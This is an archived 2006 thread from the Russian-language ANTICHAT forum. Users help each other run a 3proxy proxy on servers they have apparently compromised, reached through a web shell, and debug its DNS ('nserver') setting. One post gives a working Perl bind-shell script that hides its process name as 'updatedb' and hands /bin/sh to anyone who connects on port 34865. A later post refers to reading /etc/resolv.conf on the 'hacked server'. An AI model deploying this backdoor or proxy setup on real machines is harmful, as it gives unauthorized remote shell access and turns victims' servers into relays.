ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
24.05.2006, 04:07
|
|
Постоянный
Регистрация: 01.02.2006
Сообщений: 523
Провел на форуме:
1730553
Репутация:
319
|
|
|
|
|
24.05.2006, 04:19
|
|
Познавший АНТИЧАТ
Регистрация: 07.05.2006
Сообщений: 1,031
Провел на форуме:
5885100
Репутация:
773
|
|
Кстате иногда надо еще и порт самому открывать
Вот скрипт на перле
#!/usr/bin/perl
$port = 34865;
exit if fork;
$0 = "updatedb" . " " x100;
$SIG{CHLD} = 'IGNORE';
use Socket;
socket(S, PF_INET, SOCK_STREAM, 0);
setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
bind(S, sockaddr_in($port, INADDR_ANY));
listen(S, 50);
while(1){
accept(X, S);
unless(fork)
{ open STDIN, "<&X";
open STDOUT, ">&X";
open STDERR, ">&X";
close X;
exec("/bin/sh");
} close X;}
Запускается как обычно (ето в фаил например bind.pl) perl bind.pl и в настройках прокси указываем порт который открыл!!! |
|
|
|
24.05.2006, 04:26
|
|
Постоянный
Регистрация: 01.02.2006
Сообщений: 523
Провел на форуме:
1730553
Репутация:
319
|
|
Zitt,не путай новичков 
В данной статье всё делается через web-шелл и не надо открывать не каких портов. |
|
|
|
24.05.2006, 04:30
|
|
Познавший АНТИЧАТ
Регистрация: 07.05.2006
Сообщений: 1,031
Провел на форуме:
5885100
Репутация:
773
|
|
Ну а я про што и в веб шелле мона набрать "perl bind.pl"
P.S.
З.ы-podkashey ты истеричка 12-и летняя.
Заканчивал бы ты с етим! Сколько можно!
Вроде разобрались
Последний раз редактировалось Zitt; 24.05.2006 в 04:33..
|
|
|
|
24.05.2006, 18:11
|
|
Green member - Level 3
Регистрация: 26.03.2005
Сообщений: 191
Провел на форуме:
6768708
Репутация:
185
|
|
Сообщение от +toxa+
Юзай такой конфиг
Код:
nserver 127.0.0.1
auth none
allow *
proxy -p3128 -a
internal 127.0.0.1
log /dev/null
вот тут то как раз и ошибка, когда всегда вылетает 502-ой, неправильно указан nserver тут или узнать его адрес ну скажем командой nslookup blablalba.com будет типа
Код:
Server: 10.10.10.10
Address: 10.10.10.10#53
это и есть адрес name server'a он же dns =) или вообще убрать эту строку, тогда он будет определяться с помощью системных функций, как сказано в документации к 3proxy.
__________________
Дайте мне точку опоры и я переверну землю!
irc.antichat.net #antichat
|
|
|
|
24.05.2006, 21:27
|
|
Познающий
Регистрация: 10.02.2006
Сообщений: 42
Провел на форуме:
458694
Репутация:
20
|
|
2 dim_ok
нет не удаляй строка "nserver 127.0.0.1" нужна обязательно. Прикол в том что когда указываешь адрес "127.0.0.1" то поидее это автоматическое определение, но у меня на многих серваках эта хня не работала. Тебе нужно вместо "127.0.0.1" вписать адрес какогонибудь сервака DNS который находится в инете (любого) и заработает
|
|
|
|
24.05.2006, 23:18
|
|
Познавший АНТИЧАТ
Регистрация: 07.05.2006
Сообщений: 1,031
Провел на форуме:
5885100
Репутация:
773
|
|
Тебе нужно вместо "127.0.0.1" вписать адрес какогонибудь сервака DNS который находится в инете (любого) и заработает
Чёта вериться с трудом хотя хз... всё может быт)))
А вобще надо выполнить "/sbin/ifconfig" там будет много всякой инфы и среди неё и ip
|
|
|
|
25.05.2006, 10:52
|
|
Познающий
Регистрация: 10.02.2006
Сообщений: 42
Провел на форуме:
458694
Репутация:
20
|
|
Сообщение от Zitt
Чёта вериться с трудом хотя хз... всё может быт)))
А вобще надо выполнить "/sbin/ifconfig" там будет много всякой инфы и среди неё и ip
А почему верится с трудом ведь ошибка 502 Bad Gateway в данном конкретном случае как раз и означает неправильный ответ сервера. То есть он не может найти DNS имя запрашиваемого ресурса, потому что строка nserver 127.0.0.1 означает, что DNS сервер находится на локалхосте. Есть ли он там на самом деле проверить очень просто просканить этот сервак на 53 порт на котором и весить DNS сервер. А у [bobs] походу на этом серваке нет DNS сервера поэтому ему необходимо указать любой другой. Всё просто. А командой ifconfig –a ты узнаешь IP самого сервака + возможно броадкаст но никак не то что есть ли DNS сервер на этой машине. А IP машины вписывается не в nserver 127.0.0.1 а в internal 127.0.0.1 тодиш на какой интерфейс приходят входящие пакеты.
|
|
|
|
25.05.2006, 23:34
|
|
Познавший АНТИЧАТ
Регистрация: 07.05.2006
Сообщений: 1,031
Провел на форуме:
5885100
Репутация:
773
|
|
А командой ifconfig –a ты узнаешь IP самого сервака + возможно броадкаст но никак не то что есть ли DNS сервер на этой машине. А IP машины вписывается не в nserver 127.0.0.1 а в internal 127.0.0.1 тодиш на какой интерфейс приходят входящие пакеты.
И в правду щас попробовал там тока ip самой машины ну признаю был не прав!!!
|
|
|
|
27.06.2006, 15:27
|
|
Познающий
Регистрация: 10.02.2006
Сообщений: 42
Провел на форуме:
458694
Репутация:
20
|
|
Кстати чтобы узнать с какими DNS серверами работает взломанный сервак нужно просто просмотреть файл resolv.conf ну допустим через редактор cat:
cat /etc/resolv.conf
и заменить IP адрес 127.0.0.1 в строке nserver 127.0.0.1 на IP из файла resolv.conf
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
